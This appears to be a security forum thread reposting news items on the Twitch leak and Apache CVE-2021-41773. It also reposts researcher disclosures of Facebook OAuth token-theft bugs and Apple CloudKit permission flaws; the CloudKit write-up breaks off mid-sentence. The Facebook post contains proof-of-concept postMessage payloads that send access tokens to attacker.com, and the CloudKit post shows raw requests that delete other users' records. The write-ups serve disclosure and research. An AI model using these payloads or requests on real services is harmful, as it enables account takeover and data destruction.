causing damages upwards of $150 million, according to the Ukrainian National Police. The identity of the syndicate has not been disclosed. One of the two arrestees, a 25-year-old Ukrainian national, allegedly deployed "virus software" by breaking into remote working programs, with the intrusions staged through social engineering campaigns that delivered spam messages containing malicious content to corporate email inboxes, the agency added. The development comes over three months after the Ukrainian authorities took steps to arrest members of the Clop ransomware gang and disrupt the infrastructure the group employed in attacks targeting victims worldwide dating all the way back to 2019. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2021/10/ransomware-hackers-who-attacked-over.html
  19. An unknown individual has leaked the source code and business data of video streaming platform Twitch via a torrent file posted on the 4chan discussion board earlier today. The leaker said they shared the data as a response to the recent “hate raids” —coordinated bot attacks posting hateful and abusive content in Twitch chats— that have plagued the platform’s top streamers over the summer. “Their community is […] a disgusting toxic cesspool, so to foster more disruption and competition in the online video streaming space, we have completely pwned them, and in part one, are releasing the source code from almost 6,000 internal Git repositories,” the leaker said earlier today. The Record has downloaded parts of the 125 GB torrent file shared by the leaker in order to confirm its authenticity. IMAGE: THE RECORD The content of the leak is in tune with what the leaker claimed to have shared earlier today, quoted below: Entirety of Twitch.tv, with commit history going back to its early beginnings Mobile, desktop and video game console Twitch clients Various proprietary SDKs and internal AWS services used by Twitch Every other property that Twitch owns including IGDB and CurseForge An unreleased Steam competitor from Amazon Game Studios Twitch SOC internal red teaming tools (lol) AND: Creator payout reports from 2019 until now. Find out how much your favorite streamer is really making! Among the treasure trove of data, the most sensitive folders are the ones holding information about Twitch’s user identity and authentication mechanisms, admin management tools, and data from Twitch’s internal security team, including white-boarded threat models describing various parts of Twitch’s backend infrastructure [see redacted image below]. IMAGE: THE RECORD IMAGE: THE RECORD While at the time of writing, The Record was unable to find personal details for any Twitch users, the leak also contained payout schemes for the platform’s top streamers, some of which had already confirmed its accuracy [1, 2, 3, 4]. The data, which we will not be linking or sharing in any way, is exposing the monthly revenues for some of the platform’s biggest earners, some of which reach six-figure sums; data that could be a boon for extortionists and criminal groups. A Twitch spokesperson did not immediately return a request for comment regarding today’s leak. The source of the leak is currently believed to be an internal Git server. Git servers are typically used by companies to allow large teams of programmers to make controlled and easily reversible changes to source code repositories. The leak was also labeled as “part one,” suggesting that more data will be leaked in the future. Although no user data was found in the leak, several security researchers have urged users to change their passwords and enable a multi-factor authentication solution for their account as a precaution. The leak comes a month after thousands of Twitch streams organized the #ADayOffTwitch walkout on September 1, refusing to stream in response to the ever-increasing hate raids. In August, Twitch promised to address the hate raids in a message posted on Twitter, asking for patience as the spam attacks did not have “a simple fix.” Article text has been updated with additional screenshots of the leak and confirmations from Twitch streamers. Title and text have updated to remove mention of Anonymous hacker collective as the source of the leak. Source: https://therecord.media/twitch-source-code-and-business-data-leaked-on-4chan/
  20. Apache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild. "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root," the open-source project maintainers noted in an advisory published Tuesday. "If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts." The flaw, tracked as CVE-2021-41773, affects only Apache HTTP server version 2.4.49. Ash Daulton and cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021. Source: PT SWARM Also resolved by Apache is a null pointer dereference vulnerability observed during processing HTTP/2 requests (CVE-2021-41524), thus allowing an adversary to perform a denial-of-service (DoS) attack on the server. The non-profit corporation said the weakness was introduced in version 2.4.49. Apache users are highly recommended to patch as soon as possible to contain the path traversal vulnerability and mitigate any risk associated with active exploitation of the flaw. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. https://securityaffairs.co/wordpress/122999/hacking/apache-zero-day-flaw.html
  21. Summery Facebook allowed online games owners to host their games/applications in apps.facebook.com for many years now. The idea and technology behind it was that the game ( Flash or HTML5 based) would be hosted in the owner website and later the website page hosting it should be shown to the Facebook user in apps.facebook.com inside a controlled iframe. Since the game is not hosted in Facebook and for best user experience like keeping score and profile data, Facebook had to establish a communication channel with the game owner to verify the identity of the Facebook user for example. This was ensured by using cross windows communication/messaging between apps.facebook.com and the game website inside the iframe. In this blog post, i’ll be discussing multiple vulnerabilities i found in this implementation. Vulnerabilities potential These bugs were found after careful auditing of the client-side code inside apps.facebook.com responsible of verifying what’s coming through this channel. The bugs explained below (and others) allowed me to takeover any Facebook account if the user decided to visit my game page inside apps.facebook.com. The severity of these bugs is high since these were present for years and billions of user and their information could have been compromised easily since this was served from inside Facebook. Facebook confirmed they didn’t see any indicators of previous abuse or exploitation of these bugs. For Researchers Before explaining the actual bugs below, i tried to show the way i decomposed the code and a simplified path to track the flow of the message data and how its components will be used. I probably didn’t left much to dig but i hope the information shared could help you in your research. If you are only interested in the bugs themselves then jump to each bug section part. Description So far we know that the game page being served inside an iframe in apps.facebook.com is communicating with the parent window to ask Facebook to do some actions. Among the requested actions , for example , is to show a dialog to the user that would allow him to confirm the usage of the Facebook application owned by the game developers which would help me to identify you and get some information from an access token that they’ll receive if the user decided to user the application. The script responsible of receiving the cross window messages, interpreting them and understanding the action demanded is below ( only necessary parts are shown and as they were before the bugs were fixed ) : __d("XdArbiter", ... handleMessage: function(a, b, e) { d("Log").debug("XdArbiter at " + (window.name != null && window.name !== "" ? window.name : window == top ? "top" : "[no name]") + " handleMessage " + JSON.stringify(a)); if (typeof a === "string" && /^FB_RPC:/.test(a)) { k.enqueue([a.substring(7), { origin: b, source: e || i[h] }]); ... send: function(a, b, e) { var f = e in i ? e : h; a = typeof a === "string" ? a : c("QueryString").encode(a); b = b; try { d("SecurePostMessage").sendMessageToSpecificOrigin(b, a, e) } catch (a) { d("Log").error("XdArbiter: Proxy for %s not available, page might have been navigated: %s", f, a.message), delete i[f] } return !0 } ... window.addEventListener("message", function(a) { if (a.data.xdArbiterSyn) d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, { xdArbiterAck: !0 }); else if (a.data.xdArbiterRegister) { var b = l.register(a.source, a.data.xdProxyName, a.data.origin, a.origin); d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, { xdArbiterRegisterAck: b }) } else a.data.xdArbiterHandleMessage && l.handleMessage(a.data.message, a.data.origin, a.source) }), 98); __d("JSONRPC", ... c.read = function(a, c) { ... e = this.local[a.method]; try { e = e.apply(c || null, a.params); typeof e !== "undefined" && g("result", e) ... e.exports = a }), null); __d("PlatformAppController", ... function f(a, b, e) { ... c("PlatformDialogClient").async(f, a, function(d) { ... b(d) }); }... t.local.showDialog = f; ... t = new(c("JSONRPC"))(function(a, b) { var d = b.origin || k; b = b.source; if (b == null) { var e = c("ge")(j); b = e.contentWindow } c("XdArbiter").send("FB_RPC:" + a, b, d) } ... }), null); __d("PlatformDialogClient", ... function async(a, b, e) { var f = c("guid")(), g = b.state; b.state = f; b.redirect_uri = new(c("URI"))("/dialog/return/arbiter").setSubdomain("www").setFragment(c("QueryString").encode({ origin: b.redirect_uri })).getQualifiedURI().toString(); b.display = "async"; j[f] = { callback: e || function() {}, state: g }; e = "POST"; d("AsyncDialog").send(new(c("AsyncRequest"))(this.getURI(a, b)).setMethod(e).setReadOnly(!0).setAbortHandler(k(f)).setErrorHandler(l(f))) } ... function getURI(a, b) { if (b.version) { var d = new(c("URI"))("/" + b.version + "/dialog/" + a); delete b.version; return d.addQueryData(b) } return c("PlatformVersioning").versionAwareURI(new(c("URI"))("/dialog/" + a).addQueryData(b)) } }), 98); To simplify the code for you to understand the flow in case someone decides to dig more into it and looks for more bugs : Iframe sends message to parent => Message event dispatched in XdArbiter => Message handler function passes data to handleMessage function => “enqueue” function passes to JSONRPC => JSONRPC.read calls this.local.showDialog function in PlatformAppController => function checks message and if all valid, call PlatformDialogClient => PlatformDialogClient.async sends a POST request to apps.facebook.com/dialog/oauth , returned access_token would be passed to XdArbiter.send function ( few steps were skipped ) => XdArbiter.send would send a cross window message to the iframe window => Event dispatched in iframe window containing Facebook user access_token Below an example of a simple code to construct the message to be sent to apps.facebook.com from the iframe, a similar one would be send from any game page using the Facebook Javascript SDK but with more unnecessary parts: msg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://ysamm.com/callback","app_id":"APP_ID","client_id":"APP_ID","response_type":"token"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + msg , origin: IFRAME_ORIGIN} window.parent.postMessage(fullmsg,"*"); Interested parts to manipulate are : – IFRAME_ORIGIN, which is the one to be used in the redirect_uri parameter send with the POST request to apps.facebook.com/dialog/oauth to be verified server-side that it’s a domain owned by the application requesting an access_token, then would be used as targetOrigin in postMessage to send a cross window message to the iframe with the access_token – Keys and values of the object inside params , there are the parameters to be appended to apps.facebook.com/dialog/oauth. Most interesting ones are redirect_uri ( which can replace IFRAME_ORIGIN in the POST request in some cases ) and APP_ID Attacks vectors/scenarios What we’ll do here is to try to instead of requesting an access token for the game application we own, we’ll try to get one of a Facebook first party application like Instagram. What’s holding us back is although we control the IFRAME_ORIGIN and APP_ID which we can set to match the Instagram application as www.instagram.com and 124024574287414, later the message sent to the iframe containing the first party access token would have a targetOrigin in postMessage as www.instagram.com which is not our window origin. Facebook did a good job protecting against these attacks ( i’ll argue though to why not using the origin from the event message received and matching app_id to the hosted game instead of giving us total freedom which could have prevented all these bugs ), but apparently they left some weaknesses that could have been exploited for many years. Bug 1: Parameter Pollution, it was checked server-side and we definitely should trust it This bug occurs due to the fact that the POST request to https://apps.facebook.com/dialog/oauth when constructed from the received message from the iframe, could contain user controlled parameters. All parameters are checked in the client-side ( PlatformAppController, showDialog method and ,PlatformDialogClient.async method) and duplicate parameters will be removed in PlatformAppController , also AsyncRequest module seems to be doing some filtering ( removing parameters that already exist but brackets were appended to it ). However due to some missing checking in the server-side, a parameter name set to PARAM[random would replace a previously set parameter PARAM ; for example redirect_uri[0 parameter value would replace redirect_uri. We can abuse this as follow : 1) Set APP_ID to be the Instagram application id. 2) The redirect_uri will be constructed in PlatformDialogClient.async (Line 72 ) using IFRAME_ORIGIN ( will end up https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com ) , which would be sent matching our iframe window origin but won’t be used at all as explained below. 3) Set redirect_uri[0 in params as an additional parameter ( order matters so it must be after redirect_uri ) to be https://www.instagram.com/accounts/signup/ which is a valid redirect_uri for the Instagram applicaiton. The URL of the POST request end up being something like this: https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com&app_id=124024574287414&client_id=124024574287414&response_type=token&redirect_uri[0=https://www.instagram.com/accounts/signup/ The request would end up being successful and returning a first party access token since redirect_uri[0 replaces redirect_uri and it’s a valid redirect_uri. In the client side though, the logic is if an access_token was received it means that the origin used to construct the redirect_uri did work with the app_id and for that it should trust it and use to send the message to the iframe, behind the scenes though redirect_uri[0 was used and not redirect_uri ( Cool right?) Proof of concept: xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://attacker.com/callback","app_id":"124024574287414","client_id":"124024574287414","response_type":"token","redirect_uri[0":"https://www.instagram.com/accounts/signup/"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"} window.parent.postMessage(fullmsg,"*"); Bug 2: Why bothering, Origin is undefined The main problem for this one is that /dialog/oauth endpoint would accept https://www.facebook.com/dialog/return/arbiter as a valid redirect_uri ( without a valid origin in the fragment part ) for third-party applications and some first-party ones. The second problem is that this behaviour to occur ( no origin in the fragment part ), the message sent from the iframe to apps.facebook.com should not contain a.data.origin ( IFRAME_ORIGIN is undefined ) , however this same value would be used later to send a cross window message to the iframe, if null or undefined is used, the message won’t be received. Likely, i noticed that JSONRPC function would always receive a not null origin of the postMessage ( Line 55 ) . Since b.origin is undefined or null, k would be chosen. k could be set by the attacker by first registering a valid origin via c(“Arbiter”).subscribe(“XdArbiter/register”) which could be informed if our message had xdArbiterRegister and a specified origin . Before “k” variable is set, the supplied origin would be checked first if it belongs to the attacker application using “/platform/app_owned_url_check/” endpoint. This is wrong and the second problem occurs here since we can’t ensure that the user in the next cross origin message sent from the iframe would supply the same APP_ID. Not all first-party applications are vulnerable to this though. I used the Facebook Watch for Android application or Portal to get a first party access_token. The URL of the POST request would be something like this: https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter&app_id=1348564698517390&client_id=1348564698517390&response_type=token Proof Of Concept window.parent.postMessage({xdArbiterRegister:true,origin:"https://attacker.com"},"*") xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","app_id":"1348564698517390","client_id":"1348564698517390","response_type":"token"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg} window.parent.postMessage(fullmsg,"*"); Bug 3: Total Chaos, version can’t be harmful This bug one occurs in PlatformDialogClient.getURI function which is responsible of setting the API version before /dialog/oauth endpoint. This function didn’t check for double dots or added paths and directly constructed a URI object to be used later to send an XHR request ( Line 86 ). The version property in params passed in the cross window message sent to apps.facebook.com could be set to api/graphql/?doc_id=DOC_ID&variables=VAR# and would eventually lead to a POST request sent to the GraphQL endpoint with valid user CSRF token. DOC_ID and VAR could be set to an id of a GraphQL Mutation to add a phone number to the attacount, and the variables of this mutation. The URL of the POST request would be something like this: https://apps.facebook.com/api/graphql?doc_id=DOC_ID&variables=VAR&?/dialog/oauth&state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=attacker&app_id=1348564698517390&client_id=1348564698517390&response_type=token Proof Of Concept xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","client_id":"APP_ID","response_type":"token","version":"api/graphql?doc_id=DOC_ID&variables=VAR&"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"} window.parent.postMessage(fullmsg,"*"); Timeline Aug 4, 2021— Report Sent  Aug 4, 2021—  Acknowledged by Facebook Aug 6, 2021— Fixed by Facebook Sep 2, 2021 — $42000 bounty awarded by Facebook. Aug 9, 2021— Report Sent  Aug 9, 2021—  Acknowledged by Facebook Aug 12, 2021— Fixed by Facebook Aug 31, 2021 — $42000 bounty awarded by Facebook. Aug 12, 2021— Report Sent  Aug 13, 2021—  Acknowledged by Facebook Aug 17, 2021— Fixed by Facebook Sep 2, 2021 — $42000 bounty awarded by Facebook. Source: https://ysamm.com/?p=708
      • 2
      • Upvote
  22. TL;DR. CloudKit, the data storage framework by Apple, has various access controls. These access controls could be misconfigured, even by Apple themselves, which affected Apple’s own apps using CloudKit. This blog post explains in detail three bugs found in iCrowd+, Apple News and Apple Shortcuts with different criticality uncovered by Frans Rosen while hacking Cloudkit. All bugs were reported to and fixed by the Apple Security Bounty program. Intro Ever since the fantastic “We Hacked Apple for 3 Month” article by Ziot, Sam, Ben, Samuel and Tanner, I wanted to approach Apple myself, looking for bugs with my own mindset. The article they wrote is still one of the best inspirational posts I’ve ever read and it’s still a post I regularly go back to for more info. In the middle of February this year I had the ability to spend some time and I decided to go all in on hunting bugs on Apple. If you’ve been in and out of bug hunting you might recognize the same kind of feeling I had. I felt that I sucked, that I could not find anything interesting. Ben and the team had already found all the bugs, right? It took me three days, three days of fighting the imposter syndrome, feeling worthless and almost stressed by not getting anywhere. I was intercepting requests all over the place, modifying things cluelessly and expecting miracles. Miracles don’t work that way. On the third day, I started to connect the dots, realized how certain assets connected to other assets, and started to understand more how things worked. This is when some of the first bugs popped up, finally restoring my self-esteem a bit, making me more relaxed and focused going forward. I dug up an old jailbroken iPad I had, which allowed me to proxy all content through my laptop. I downloaded all Apple owned apps and started looking at the traffic. What is CloudKit? Quite early on I noticed that a lot of Apple’s own apps used a technology called CloudKit and you could say it is Apple’s equivalent to Google’s Firebase. It has a database storage that is possible to authenticate to and directly fetch and save records from the client itself. I started reading the CloudKit documentation and used the CloudKit Catalog tool and created my own container to play around with it. Before getting into the hacking of Cloudkit, here’s a short description of the structure of CloudKit, this is the 30 second explanation: You create a container with a name. Suggested format is reversed domain structure, like com.apple.xxx. All containers you create yourself will begin with iCloud. Inside the container you have two environments, Development and Production. Inside the environments you have three different scopes, Private, Shared and Public. Private is only accessible by your own user. Shared is used for data being shared between users and Public is accessible by anyone, some parts with a public API-token, and some with authentication (with some exceptions, I’ll get to that below). Inside each scope, you have different zones you can create. Default zone is called _defaultZone. Inside each zone, you have different record types that you can create yourself. Each record type can contain different record fields, these fields can save different types of data, like INT, BOOLEAN, TEXT, BINARY etc. Inside each zone you also have records. Each record is always connected to a record type. There are even more features to it of course, for example the ability to create indexes and security roles with permissions. For Private and Shared scopes, you always need to authenticate as yourself. For the Public scope, you can have the ability to both read and write to the scope without personal authentication. You can enable public tokens that give you access to the public scope, but with the combination of authenticating as your own user gives access to the Private and Shared scopes. It was quite complex to understand all different authentication flows, and security roles, and this made me curious. Could it be that this was not only complex for me to understand, but also for teams using it internally at Apple? I started investigating where it was being used and for what. Reconnaissance To be able to understand where the CloudKit service was used by Apple themselves, I started to see in what ways all different apps connected to it. By just proxying everything from the iPad, the browser and using all apps, I could gather a bunch of requests and responses. After looking it through I noticed that Apple used different ways to connect to CloudKit. The iCloud assets, like Notes and Photos on www.icloud.com used one API: POST /database/1/com.apple.notes/production/public/records/resolve?... Host: p55-ckdatabasews.icloud.com and the developer portal at icloud.developer.apple.com had a different API: POST /r/v4/user/iCloud.com.mycontainer.test/Production/public/records/query?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com A lot of iOS-apps used a third API at gateway.icloud.com. This API used headers to specify what container was being used. These requests were almost always using protobuf: POST /ckdatabase/api/client/record/save HTTP/1.1 Host: gateway.icloud.com:443 X-CloudKit-ContainerId: com.apple.siri.data Accept: application/x-protobuf Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true if you used the CloudKit Catalog to test CloudKit API, it would instead use api.apple-cloudkit.com: POST /database/1/iCloud.com.example.CloudKitCatalog/production/public/records/query?... Host: api.apple-cloudkit.com For CloudKit Catalog you needed an API-token for getting access to the public scope. When I tried connecting to the CloudKit containers I saw while intercepting the iOS-apps, I failed due to the lack of the API-token needed to complete the authentication flow. iCrowd+ When testing all the apps and subdomains of Apple, one website, made by Apple, was actually utilizing the api.apple-cloudkit.com with an API-token provided. Going to https://public.icrowd.apple.com/ I could see the containers being used in the Javascript-file: containers: [{ containerIdentifier:"iCloud.com.apple.phonemo", apiTokenAuth: { apiToken:"f260733f..." }, environment:"production" }, { containerIdentifier:"iCloud.com.apple.icrowd", apiTokenAuth: { apiToken:"b90c3b24..." }, environment:"production" }] It then made a request to fetch the current version of the iCrowd+ application, to show the version on the start page: I could also see in the requests made by the websites that it was querying the records of the database, and that the record type was called Updates: "records" : [ { "recordName" :"FD935FB2-A401-6F05-E9D8-631BBC2A68A1", "recordType" :"Updates", "fields" : { "name" : { "value" :"iCrowd", "type" :"STRING" }, "description" : { "value" :"Updated to support iOS 14 and Personalized Hey Siri project.", "type" :"STRING" }, "version" : { "value" :"2.16.3", "type" :"STRING" }, "required" : { "value" :1, "type" :"INT64" } }, Since I had the token, I could use the CloudKit Catalog to connect to the Container: https://cdn.apple-cloudkit.com/cloudkit-catalog/?container=iCloud.com.apple.phonemo&environment=production&apiToken=f260733f...#authentication Looking at the records of the Public scope, I could see the data the website was fetching to use the version-data for the button: I then tried to add my own record to the same zone: Which gave me a response: When I now accessed the same website again at: https://public.icrowd.apple.com/, this is what I saw: I then realized that I could modify the data of the website, made a report to Apple on the 17th of February and deleted my record quickly again. Here’s a video showing the proof of concept I sent: I now realized that there might be other bugs related to permissions and that the public scope was the most interesting one, since it was shared among all users. I continued the process of finding where CloudKit databases were being utilized. Apple’s response Apple responded and fixed the issue on the 25th of February by completely removing the usage of CloudKit from the website at https://public.icrowd.apple.com/. Apple News Apple News was not really accessible from Sweden, so I created a new Apple ID based in the United States to be able to use it. As soon as I got in, I noticed that all news was served using CloudKit, and all articles were served from the public scope. That made sense, since news content was the same for all users. I could also see that the Stock app on iOS also fetched from the same container: GET /ckdatabase/stocks/topstories/WHT4Rx3... HTTP/1.1 Host: gateway.icloud.com:443 X-CloudKit-ContainerId: com.apple.news.public X-CloudKit-DatabaseScope: Public X-CloudKit-BundleId: com.apple.stocks User-Agent: AppleNews/679 Version/3.1 X-MMe-Client-Info: <iPad5,4> <iPhone OS;14.2;18B92> <com.apple.newscore/6.1 (com.apple.stocks/3.1)> Using the CloudKit API through gateway.icloud.com was tricky though. All communication was made through protobuf. There is an awesome project called InflatableDonkey that tries to reverse engineer the iCloud backup process from iOS 9. Since that project was only focusing on fetching data, a lot of methods in the Protobuf was not fully reversed, so I had to bruteforce a bit to try to find the methods needed also for modifications, and since Protobuf is binary, I didn’t really need the proper names, since each property in the protobuf is enumerable due to how the format is designed: I spent way too much time on this, almost two days straight, but as soon as I found methods I could use, modification of records in the Public scope still needed authorization for my user, and I was never able to figure out how to generate a X-CloudKit-AuthToken for the proper scope, since I was mainly interested in the Private scope. But remember that I mentioned different APIs talked with CloudKit differently? I logged in to www.icloud.com and went to the Notes-app, which talked with CloudKit using p55-ckdatabasews.icloud.com: POST /database/1/com.apple.notes/production/private/records/query?clientBuildNumber=2104Project55&clientMasteringNumber=2104B31 HTTP/1.1 Host: p55-ckdatabasews.icloud.com I then changed the container from com.apple.notes to com.apple.news.public with the public scope instead. I also extracted one of the articles I could see using the app in the protobuf communication to gateway.icloud.com: POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38& clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: X-APPLE-WEB-ID=... { "records": { "recordName":"A-OQYAcObS_W_21xWarFxFQ" }, "zoneID": { "zoneName":"_defaultZone" } } And the response was: { "records" : [ { "recordName" :"A-OQYAcObS_W_21xWarFxFQ", "recordType" :"Article", "fields" : { "iAdKeywords" : { "value" : ["TGiSf6ByLEeqXjy5yjOiBJQ","TGiSr-hyLEeqXjy5yjOiBJQ","TdNFQ6jKmRsSURg96xf4Xiw" ], "type" :"STRING_LIST" }, "topicFlags_143455" : { "value" : [12,0 ], "type" :"INT64_LIST" ... I also verified that stock-data was present: { "records": { "recordName":"S-AAPL" }, "zoneID": { "zoneName":"_defaultZone" } } this gave me: { "records" : [ { "recordName" :"S-AAPL", "recordType" :"Stock", "fields" : { "stockEntityID" : { "value" :"EKaaFEbKHS32-pJMZGHyfNw", "type" :"STRING" }, "symbol" : { "value" :"AAPL", "type" :"STRING" }, "feedConfiguration_143441" : { "value" :"{\"feedID\":\"EKaaFEbKHS32-pJMZGHyfNw$en-US\"}", "type" :"STRING" }, Success! I now knew that I could talk with the com.apple.news.public-container using the authenticated API on p55-ckdatabasews.icloud.com. I had a different Apple ID set up as a News Publisher, so I could create article drafts and create a published channel to the Apple News app. I created a channel and an article and started testing calls to them. Since the Apple ID I used for making requests to the API, I knew that if I could make modifications to the content, I could modify any article or stock data. The Channel-ID I had was TtVkjIR3aTPKrWAykey3ANA. Making a lookup query: POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: X-APPLE-WEB-ID=... showed me my test channel: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "recordType" :"Tag", "fields" : { "relatedTopicTagIDsForOnboarding_143455" : { "value" : [ ], "type" :"STRING_LIST" }, "defaultSectionTagID" : { "value" :"T18PTnZkqQ0qgW33zGzxs8w", "type" :"STRING" }, ... "name" : { "value" :"moa oma", "type" :"STRING" }, With my iPad, I also verified by going to https://apple.news/TtVkjIR3aTPKrWAykey3ANA I could see my channel in the Apple News app. I then tried all the methods that was possible against records using records/modify, based on the CloudKit documentation: create, update, forceUpdate, replace, forceReplace, delete and forceDelete. On all methods, the response looked like this: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"Operation not permitted", "serverErrorCode" :"ACCESS_DENIED" } ] } But, on forceDelete: POST /database/1/com.apple.news.public/production/public/records/modify?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: ... { "numbersAsStrings":true, "operations": [ { "record": { "recordType":"Article", "recordChangeTag": "ok", "recordName":"TtVkjIR3aTPKrWAykey3ANA" }, "operationType":"forceDelete" } ], "zoneID": { "zoneName":"_defaultZone" } } The response said: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "deleted" :true } ] } I reloaded the channel in Apple News: This confirmed to me that I could delete any channel or article, including stock entries, in the container com.apple.news.public being used for the Stock and Apple News iOS-apps. This worked due to the fact that I could make authenticated calls to CloudKit from the API being used for the Notes-app on www.icloud.com and due to a misconfiguration of the records added in the com.apple.news.public-container. I made a proof of concept to Apple and sent it as a different report on the 17th of March. Apple’s response Apple replied with a fix in place on the 19th of March by modifying the permissions of the records added to com.apple.news.public, where even the forceDelete-call would respond with: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"delete operation not allowed", "serverErrorCode" :"ACCESS_DENIED" } ] } I also notified Apple about more of their own containers still having the ability to delete content from, however, it wasn’t clear if those containers were actually using the Public scope at all. Shortcuts Another app that was using the Public scope of CloudKit was Shortcuts. With Apple Shortcuts you can create logical flows that can be launched automatically or manually which then triggers different actions across your apps on iOS-devices. These shortcuts can be shared with other people using iCloud-links which creates an ecosystem around them. There are websites dedicated to recommending and sharing these Shortcuts through iCloud-links. As mentioned above, there is a Shared scope in a CloudKit container. When you decide to share anything private, this scope is often used. You would get something called a Short GUID, that looks something like 0H1FzBMaF1yAC7qe8B2OIOCxx and it would be possible to access using https://www.icloud.com/share/[shortGUID]. However, Apple Shortcuts links works a bit differently. When you share a shortcut, a record with the record type SharedShortcut will be created in the Public scope. The Record name being used will then be formed as a GUID: EA15DF64-62FD-4733-A115-452A6D1D6AAF, the record name will then be formatted to a lowercase string without hyphens and end up as: https://www.icloud.com/shortcuts/ea15df6462fd4733a115452a6d1d6aaf which will be the URL you would share publicly. Accessing this URL would then make a call to: https://www.icloud.com/shortcuts/api/records/ea15df6462fd4733a115452a6d1d6aaf which would return the data from CloudKit: { "recordType":"SharedShortcut", "created": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "recordChangeTag":"jnm8rnmw", "pluginFields": {}, "deleted":false, "recordName":"EA15DF64-62FD-4733-A115-452A6D1D6AAF", "modified": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "fields": { "icon_glyph": { "type":"NUMBER_INT64", "value":59412 }, "icon": { "type":"ASSETID", "value": { "downloadURL":"..." This made me excited since I could already see a few attack scenarios. If I could modify other users’ shortcuts, that would be really bad. Also the same kind of issue as on Apple News, being able to delete someone else’s shortcut, would also not be great. The Public scope also contained the Shortcuts Gallery that was showing up in the app itself: So if that content could be modified that would be quite critical. The Shortcuts app itself used the protobuf API at gateway.icloud.com: POST /ckdatabase/api/client/record/save HTTP/1.1 Host: gateway.icloud.com X-CloudKit-ContainerId: com.apple.shortcuts X-CloudKit-BundleId: com.apple.shortcuts X-CloudKit-DatabaseScope: Public Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true User-Agent: CloudKit/962 (18B92) X-CloudKit-AuthToken: [MY-TOKEN] Since I had spent so much time modifying InflatableDonkey to try all methods, I could now also use the X-CloudKit-AuthToken from my interception to try to make authorized calls to modify records to the Public scope. However, all the methods that actually did modifications gave me permission errors: "CREATE operation not permitted* ck1w5bmtg" This made me realize that through the API at gateway.icloud.com, my X-CloudKit-AuthToken did not allow me to modify any records in the Public scope. I spent almost 5-6 hours trying to identify if there were any methods I did not get permission errors on but without any luck. Since I had already reported the bugs with Apple News, and Apple had already fixed those issues, when I tried the same API connection method I initially took from Notes on www.icloud.com: POST /database/1/com.apple.shortcuts/production/public/records HTTP/1.1 Host: p55-ckdatabasews.icloud.com that also failed, the container com.apple.shortcuts was not accessible with the authentication being used from www.icloud.com. But remember that I mentioned different APIs talked with CloudKit differently? I went to icloud.developer.apple.com and connected to my own container, took one of the requests and modified the container to com.apple.shortcuts: POST /r/v4/user/com.apple.shortcuts/Production/public/records/modify?team_id=9DCADDBE3F Host: p25-ckdatabasews.icloud.apple.com This worked! I could verify this by using the records/lookup and use one of the UUIDs in the protobuf content to one of the gallery banners from the iOS-app: POST /r/v4/user/com.apple.shortcuts/Production/public/records/lookup?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com Cookie: [MY COOKIES] { "records": [ { "recordName": "C377CA6A-07D3-4A8A-A85E-3ED27EE9592E" } ], "numbersAsStrings": true, "zoneID": { "zoneName": "_defaultZone" } } This gave me: { "records" : [ { "recordName" :"C377CA6A-07D3-4A8A-A85E-3ED27EE9592E", "recordType" :"GalleryBanner", "fields" : { "iphone3xImage" : { "value" : { ... Perfect! This was now my way to talk with the Shortcuts database, the CloudKit connection from the Developer portal for CloudKit allowed me to properly authenticate to the 